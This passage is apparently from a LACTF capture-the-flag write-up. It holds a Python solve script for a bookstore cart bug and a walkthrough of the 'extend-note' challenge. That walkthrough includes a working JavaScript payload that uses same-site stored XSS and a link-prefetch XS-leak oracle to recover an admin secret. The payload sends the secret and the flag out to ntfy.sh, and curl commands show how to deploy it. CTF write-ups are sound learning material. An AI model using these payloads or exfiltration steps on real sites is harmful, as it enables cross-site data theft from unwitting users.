    return session.post(f"{BASE}{path}", json=json, data=data, allow_redirects=False, timeout=timeout)


def attempt_once() -> str:
    s = requests.Session()
    username = "u" + uuid.uuid4().hex[:10]
    password = "p" + uuid.uuid4().hex[:10]

    r = _post(s, "/register", data={"username": username, "password": password})
    if r.status_code >= 500:
        raise RuntimeError(f"register backend error: {r.status_code} {r.text[:80]}")
    if r.status_code not in (302, 303):
        raise RuntimeError(f"register failed: {r.status_code} {r.text[:200]}")

    payload = {"products": [{"book_id": CHEAP_BOOK_ID}, {"book_id": FLAG_BOOK_ID, "is_sample": True}]}
    r = _post(s, "/cart/add", json=payload)
    if r.status_code != 200:
        raise RuntimeError(f"add failed: {r.status_code} {r.text[:200]}")
    j = r.json()
    if j.get("err"):
        raise RuntimeError(f"add rejected: {j['err']}")

    r = _post(s, "/cart/checkout", data={})
    if r.status_code != 200:
        raise RuntimeError(f"checkout failed: {r.status_code} {r.text[:200]}")
    if "application/zip" not in (r.headers.get("content-type") or ""):
        raise RuntimeError(f"unexpected content-type: {r.headers.get('content-type')}")

    with zipfile.ZipFile(io.BytesIO(r.content)) as zf:
        return zf.read("flag.txt").decode(errors="replace").strip()


def main():
    for i in range(60):
        try:
            print(attempt_once())
            return 0
        except Exception:
            time.sleep(min(2.0, 0.1 * (i + 1)))
    return 1


if __name__ == "__main__":
    raise SystemExit(main())
```

### extend-note

#### Description

Customers loved append-note so much, we decided to add an extended version! :)

#### Solution

extend-note is identical to append-note (part 1) except for one line: the error page no longer reflects user input, which eliminates the XSS vector used in part 1.

**The app** (Flask 3.0.0, Python 3.14) stores a random 8-hex-char `SECRET` in a `notes` list. Three endpoints:

* `/append?content=X&url=URL` — requires admin cookie. Returns **200** if any note starts with `content`, else **404**. Always appends `content` to `notes`. Responds with a page that JS-redirects to `url` after 100ms.
* `/flag?secret=S` — returns the flag if `S == SECRET`. Has `Access-Control-Allow-Origin: *`.
* After-request headers on all responses: `X-Content-Type-Options: nosniff`, `X-Frame-Options: deny`, `Cache-Control: no-store`.

The admin bot visits any URL with an `httpOnly`, `SameSite=Lax` cookie for the challenge domain and waits 60 seconds.

**The attack has three parts:**

**1. Same-site XSS via blogler**

The blogler challenge (separate LACTF web challenge) runs on `*.instancer.lac.tf` — same site as extend-note. Blogler renders user blog posts through `mistune.html()` with Jinja2's `|safe` filter, giving us stored XSS on a same-site origin. Since both share eTLD+1 `lac.tf`, the admin's `SameSite=Lax` cookie is sent on all subresource requests from blogler to extend-note.

**2. `<link rel="prefetch">` XS-leak oracle**

The challenge's protections (`nosniff`, `X-Frame-Options: deny`, `no-store`) defeat most XS-leak techniques. Comprehensive testing of every HTML element type revealed that **`<link rel="prefetch">` is the one that differentiates HTTP status codes**:

| Element                                        | 200 (text/html + nosniff) | 404 (text/html + nosniff) |
| ---------------------------------------------- | ------------------------- | ------------------------- |
| `<script>`                                     | `onerror`                 | `onerror`                 |
| `<link rel="stylesheet">`                      | `onerror`                 | `onerror`                 |
| `<link rel="preload" as="fetch">`              | `onload`                  | `onload`                  |
| `<link rel="preload" as="script/style/image">` | `onerror`                 | `onerror`                 |
| **`<link rel="prefetch">`**                    | **`onload`**              | **`onerror`**             |
| `<img>`, `<video>`, `<audio>`, `<object>`      | `onerror`                 | `onerror`                 |

This gives a clean boolean oracle: `onload` = prefix matches (200), `onerror` = no match (404).

**3. Extract SECRET and fetch flag**

Probe the secret character by character (16 hex candidates per position, 8 positions) using the prefetch oracle, then fetch the flag from the CORS-enabled `/flag` endpoint.
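
The recovery reduces to a simple prefix-extension loop. A Python sketch against a simulated oracle (in the real exploit, `probe` is the prefetch oracle and `SECRET` is a made-up example value):

```python
def recover_secret(probe, alphabet="0123456789abcdef", length=8):
    """Extend the known prefix one character at a time; probe(p) must
    return True iff the secret starts with p (200 vs 404 in the real attack)."""
    sec = ""
    for _ in range(length):
        for c in alphabet:
            if probe(sec + c):
                sec += c
                break
    return sec

SECRET = "4b1d2c3e"  # hypothetical example secret
assert recover_secret(SECRET.startswith) == SECRET
# Worst case: 8 positions x 16 candidates = 128 probes.
```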

**Solve payload** (hosted as a blogler blog post):

```html
<script>
(async()=>{
var C='https://extend-note-XXXXX.instancer.lac.tf';
var N='https://ntfy.sh/UNIQUE_TOPIC';
function x(m){fetch(N,{method:'POST',body:m})}
function mk(c){
  return C+'/append?content='+encodeURIComponent(c)
    +'&url='+encodeURIComponent(C+'/')+'&t='+Math.random();
}
function probe(content){
  return new Promise(r=>{
    var l=document.createElement('link');
    l.rel='prefetch';
    var d=0;
    l.onload=()=>{if(!d){d=1;l.remove();r(true)}};
    l.onerror=()=>{if(!d){d=1;l.remove();r(false)}};
    l.href=mk(content);
    document.head.appendChild(l);
  });
}
x('start');
var sec='';
for(var i=0;i<8;i++){
  for(var c of '0123456789abcdef'){
    if(await probe(sec+c)){sec+=c;x('found-'+i+':'+c+' sec='+sec);break}
  }
}
x('SECRET='+sec);
try{
  var r=await fetch(C+'/flag?secret='+sec);
  var t=await r.text();
  x('FLAG='+t);
}catch(e){x('ERR='+e)}
})();
</script>
```

**Deployment steps:**

```bash
# 1. Register on blogler and upload payload as a blog post
curl -s -c cookies.txt -X POST "https://BLOGLER/register" -d "username=solve&password=solve"
curl -s -b cookies.txt -X POST "https://BLOGLER/blog" \
  --data-urlencode "title=x" --data-urlencode "blog@solve.html"

# 2. Send the blogler URL to the admin bot
curl -s -X POST "https://ADMIN_BOT/extend-note" \
  -d "url=https://BLOGLER/blog/solve&g-recaptcha-response="

# 3. Poll ntfy for flag
curl -s "https://ntfy.sh/UNIQUE_TOPIC/json?poll=1"
```

The entire extraction (8 characters × up to 16 probes each = 128 prefetch requests) completes in under 2 seconds. Results are exfiltrated via ntfy.sh.

**Flag:** `lactf{1_R34LlY_n33D_T0_r3m3m83R_t0_R3M0V3_My_d38U9_5T4t3m3nt2}`
